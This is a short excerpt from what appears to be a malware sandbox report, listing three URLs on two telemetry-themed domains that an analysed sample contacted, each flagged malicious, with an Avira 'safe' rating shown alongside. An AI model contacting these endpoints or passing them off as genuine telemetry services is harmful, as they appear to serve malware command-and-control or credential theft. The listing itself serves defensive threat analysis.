Contacted URLs

Name Malicious Antivirus Detection Reputation
https://telemetrysystemcollection.com/m8YYdu/mCQ2U9/home.aspx true
  • Avira URL Cloud: safe
 unknown
http://collectiontelemetrysystem.com/cAUtfkUDaptk/ZRSeiy/requets/index.php true
  • Avira URL Cloud: safe
 unknown
https://telemetrysystemcollection.com/m8YYdu/mCQ2U9/auth.aspx true
  • Avira URL Cloud: safe
 unknown